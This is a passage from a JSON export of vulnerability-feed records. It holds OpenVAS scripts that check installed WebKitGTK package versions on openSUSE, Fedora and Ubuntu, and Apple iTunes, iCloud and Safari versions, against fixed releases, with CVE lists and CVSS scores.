rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2\", rpm:\"webkit2gtk3-plugin-process-gtk2~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2-debuginfo\", rpm:\"webkit2gtk3-plugin-process-gtk2-debuginfo~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk3-lang\", rpm:\"libwebkit2gtk3-lang~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-32bit\", rpm:\"libjavascriptcoregtk-4_0-18-32bit~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit\", rpm:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-32bit\", rpm:\"libwebkit2gtk-4_0-37-32bit~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-debuginfo-32bit\", rpm:\"libwebkit2gtk-4_0-37-debuginfo-32bit~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-05T17:46:01", "description": "This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2018-12-06T00:00:00", "type": "openvas", "title": "Apple iTunes Security Updates(HT209345)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4437", "CVE-2018-4442", "CVE-2018-4440", "CVE-2018-4443", "CVE-2018-4438", "CVE-2018-4439", "CVE-2018-4464", "CVE-2018-4441"], "modified": "2020-03-04T00:00:00", "id": "OPENVAS:1361412562310814602", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814602", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iTunes Security Updates(HT209345)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:itunes\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814602\");\n script_version(\"2020-03-04T09:29:37+0000\");\n script_cve_id(\"CVE-2018-4440\", \"CVE-2018-4439\", \"CVE-2018-4437\", \"CVE-2018-4464\",\n \"CVE-2018-4441\", \"CVE-2018-4442\", \"CVE-2018-4443\", \"CVE-2018-4438\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-04 09:29:37 +0000 (Wed, 04 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-12-06 11:14:55 +0530 (Thu, 06 Dec 2018)\");\n script_name(\"Apple iTunes Security Updates(HT209345)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - A logic issue was addressed with improved state management.\n\n - A logic issue was addressed with improved validation.\n\n - Multiple memory corruption issues were addressed with improved memory handling.\n\n - A logic issue existed resulting in memory corruption.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation allows attackers to\n conduct spoofing attacks and run arbitrary code execution.\");\n\n script_tag(name:\"affected\", value:\"Apple iTunes versions before 12.9.2\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iTunes 12.9.2 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT209345\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_itunes_detection_win_900123.nasl\");\n script_mandatory_keys(\"iTunes/Win/Ver\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nappVer = infos['version'];\nappPath = infos['location'];\n\nif(version_is_less(version:appVer, test_version:\"12.9.2\"))\n{\n report = report_fixed_ver(installed_version:appVer, fixed_version:\"12.9.2\", install_path: appPath);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-05T17:46:26", "description": "This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2018-12-06T00:00:00", "type": "openvas", "title": "Apple iCloud Security Updates(HT209346)-Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4437", "CVE-2018-4442", "CVE-2018-4440", "CVE-2018-4443", "CVE-2018-4438", "CVE-2018-4439", "CVE-2018-4464", "CVE-2018-4441"], "modified": "2020-03-04T00:00:00", "id": "OPENVAS:1361412562310814603", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814603", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iCloud Security Updates(HT209346)-Windows\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:icloud\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814603\");\n script_version(\"2020-03-04T09:29:37+0000\");\n script_cve_id(\"CVE-2018-4440\", \"CVE-2018-4439\", \"CVE-2018-4437\", \"CVE-2018-4464\",\n \"CVE-2018-4441\", \"CVE-2018-4442\", \"CVE-2018-4443\", \"CVE-2018-4438\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-04 09:29:37 +0000 (Wed, 04 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-12-06 11:23:39 +0530 (Thu, 06 Dec 2018)\");\n script_name(\"Apple iCloud Security Updates(HT209346)-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is\n present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - A logic issue was addressed with improved state management.\n\n - A logic issue was addressed with improved validation.\n\n - Multiple memory corruption issues were addressed with improved memory handling.\n\n - A logic issue existed resulting in memory corruption.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation allows attackers to\n conduct spoofing attacks and run arbitrary code execution.\");\n\n script_tag(name:\"affected\", value:\"Apple iCloud versions before 7.9 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iCloud 7.9 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT209346\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_apple_icloud_detect_win.nasl\");\n script_mandatory_keys(\"apple/icloud/Win/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nicVer = infos['version'];\nicPath = infos['location'];\n\nif(version_is_less(version:icVer, test_version:\"7.9\"))\n{\n report = report_fixed_ver(installed_version:icVer, fixed_version:\"7.9\", install_path:icPath);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-05T17:46:20", "description": "This host is installed with Apple Safari\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2018-12-06T00:00:00", "type": "openvas", "title": "Apple Safari Security Updates(HT209344)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4437", "CVE-2018-4442", "CVE-2018-4440", "CVE-2018-4443", "CVE-2018-4445", "CVE-2018-4438", "CVE-2018-4439", "CVE-2018-4464", "CVE-2018-4441"], "modified": "2020-03-04T00:00:00", "id": "OPENVAS:1361412562310814601", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814601", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Safari Security Updates(HT209344)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:safari\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814601\");\n script_version(\"2020-03-04T09:29:37+0000\");\n script_cve_id(\"CVE-2018-4440\", \"CVE-2018-4439\", \"CVE-2018-4445\", \"CVE-2018-4437\",\n \"CVE-2018-4464\", \"CVE-2018-4441\", \"CVE-2018-4442\", \"CVE-2018-4443\",\n \"CVE-2018-4438\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-04 09:29:37 +0000 (Wed, 04 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-12-06 10:43:13 +0530 (Thu, 06 Dec 2018)\");\n script_name(\"Apple Safari Security Updates(HT209344)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Safari\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - A logic issue was addressed with improved state management.\n\n - A logic issue was addressed with improved validation.\n\n - 'Clear History and Website Data' did not clear the history.\n\n - Multiple memory corruption issues were addressed with improved memory handling.\n\n - A logic issue existed resulting in memory corruption.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation allows attackers to\n conduct spoofing attacks, arbitrary code execution and bypass security\n restrictions.\");\n\n script_tag(name:\"affected\", value:\"Apple Safari versions before 12.0.2\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Safari 12.0.2 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT209344\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"macosx_safari_detect.nasl\");\n script_mandatory_keys(\"AppleSafari/MacOSX/Version\", \"ssh/login/osx_name\", \"ssh/login/osx_version\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif((!osName && \"Mac OS X\" >!< osName) || !osVer){\n exit (0);\n}\n\nif(version_in_range(version:osVer, test_version:\"10.12\", test_version2:\"10.12.5\"))\n{\n fix = \"Upgrade Apple Mac OS X to version 10.12.6 and Update Apple Safari to version 12.0.2\";\n installedVer = \"Apple Mac OS X \" + osVer ;\n}\nelse if(version_in_range(version:osVer, test_version:\"10.13\", test_version2:\"10.13.5\"))\n{\n fix = \"Upgrade Apple Mac OS X to version 10.13.6 and Update Apple Safari to version 12.0.2\";\n installedVer = \"Apple Mac OS X \" + osVer ;\n}\nelse if(osVer == \"10.14\")\n{\n fix = \"Upgrade Apple Mac OS X to version 10.14.1 and Update Apple Safari to version 12.0.2\";\n installedVer = \"Apple Mac OS X \" + osVer ;\n}\n\nelse\n{\n if(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\n safVer = infos['version'];\n safPath = infos['location'];\n\n if(version_is_less(version:safVer, test_version:\"12.0.2\"))\n {\n fix = \"12.0.2\";\n installedVer = \"Apple Safari \" + safVer ;\n }\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:installedVer, fixed_version:fix, install_path:safPath);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:30", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-08-08T00:00:00", "type": "openvas", "title": "Fedora Update for webkitgtk4 FEDORA-2017-9d572cc64a", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7034", "CVE-2017-7064", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7030"], "modified": "2019-03-26T00:00:00", "id": "OPENVAS:1361412562310873226", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873226", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_9d572cc64a_webkitgtk4_fc24.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for webkitgtk4 FEDORA-2017-9d572cc64a\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873226\");\n script_version(\"2019-03-26T08:16:24+0000\");\n script_tag(name:\"last_modification\", value:\"2019-03-26 08:16:24 +0000 (Tue, 26 Mar 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-08-08 07:36:34 +0200 (Tue, 08 Aug 2017)\");\n script_cve_id(\"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\",\n \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7055\",\n \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for webkitgtk4 FEDORA-2017-9d572cc64a\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkitgtk4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"webkitgtk4 on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-9d572cc64a\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VIXDC655D7574NMXWPNXAFDI2JHBTWZR\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"webkitgtk4\", rpm:\"webkitgtk4~2.16.6~1.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:10", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-08-04T00:00:00", "type": "openvas", "title": "Fedora Update for webkitgtk4 FEDORA-2017-73d6a0dfbb", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7034", "CVE-2017-7064", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7030"], "modified": "2019-03-26T00:00:00", "id": "OPENVAS:1361412562310873200", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873200", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_73d6a0dfbb_webkitgtk4_fc25.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for webkitgtk4 FEDORA-2017-73d6a0dfbb\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873200\");\n script_version(\"2019-03-26T08:16:24+0000\");\n script_tag(name:\"last_modification\", value:\"2019-03-26 08:16:24 +0000 (Tue, 26 Mar 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-08-04 12:46:47 +0530 (Fri, 04 Aug 2017)\");\n script_cve_id(\"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\",\n \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7055\",\n \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for webkitgtk4 FEDORA-2017-73d6a0dfbb\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkitgtk4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"webkitgtk4 on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-73d6a0dfbb\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YOV6OOFLOHZALSKLNVHTQVXB43SXE5LW\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"webkitgtk4\", rpm:\"webkitgtk4~2.16.6~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:58", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-08-04T00:00:00", "type": "openvas", "title": "Fedora Update for webkitgtk4 FEDORA-2017-24bddb96b5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7034", "CVE-2017-7064", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7030"], "modified": "2019-03-26T00:00:00", "id": "OPENVAS:1361412562310873180", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873180", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_24bddb96b5_webkitgtk4_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for webkitgtk4 FEDORA-2017-24bddb96b5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873180\");\n script_version(\"2019-03-26T08:16:24+0000\");\n script_tag(name:\"last_modification\", value:\"2019-03-26 08:16:24 +0000 (Tue, 26 Mar 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-08-04 12:47:40 +0530 (Fri, 04 Aug 2017)\");\n script_cve_id(\"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\",\n \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7055\",\n \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for webkitgtk4 FEDORA-2017-24bddb96b5\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkitgtk4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"webkitgtk4 on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-24bddb96b5\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5WQG4TVFXCPDMB3M6X46ISBMRZAHJZ43\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"webkitgtk4\", rpm:\"webkitgtk4~2.16.6~1.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:09", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-08-03T00:00:00", "type": "openvas", "title": "Ubuntu Update for webkit2gtk USN-3376-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7034", "CVE-2017-7064", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-2538", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7052", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7030"], "modified": "2019-03-26T00:00:00", "id": "OPENVAS:1361412562310843266", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843266", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3376_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for webkit2gtk USN-3376-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843266\");\n script_version(\"2019-03-26T08:16:24+0000\");\n script_tag(name:\"last_modification\", value:\"2019-03-26 08:16:24 +0000 (Tue, 26 Mar 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-08-03 07:16:13 +0200 (Thu, 03 Aug 2017)\");\n script_cve_id(\"CVE-2017-2538\", \"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\",\n \"CVE-2017-7037\", \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\",\n \"CVE-2017-7052\", \"CVE-2017-7055\", \"CVE-2017-7056\", \"CVE-2017-7061\",\n \"CVE-2017-7064\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for webkit2gtk USN-3376-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 